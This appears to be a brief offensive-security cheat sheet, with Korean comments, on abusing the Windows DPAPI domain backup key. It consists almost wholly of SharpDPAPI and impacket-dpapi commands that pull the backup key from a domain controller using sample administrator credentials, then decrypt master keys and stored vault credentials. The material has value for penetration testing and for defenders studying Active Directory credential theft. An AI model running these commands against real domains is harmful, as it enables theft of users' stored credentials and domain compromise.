DPAPI Backup Key
Abuse
# 도메인 백업 키 추출
.\SharpDPAPI.exe backupkey /nowrap
# 자격 증명 복호화
.\SharpDPAPI.exe credentials /pvk:<Backup Key># 도메인 백업 키 추출
impacket-dpapi backupkeys -t contoso.com/Administrator:'Password123!'@192.168.1.11 -dc-ip '192.168.1.11'
# 마스터 키 복호화
impacket-dpapi masterkey -file masterkey -password 'x' -sid 'S-1-5-21-1706474481-3154330266-3610869000-500' -key 'x' -pvk backupkey.pvk
# 자격 증명 복호화
impacket-dpapi credential -file vault -key '0x46cfb8b408aab4ae66ffbbbcf67ac03cfc919587e4ec39b9a936f6c93d92386603bb56b2d861be88495529dd74b23487ab78dcd98a1576b9b30ddc10ed379f2e'References
Last updated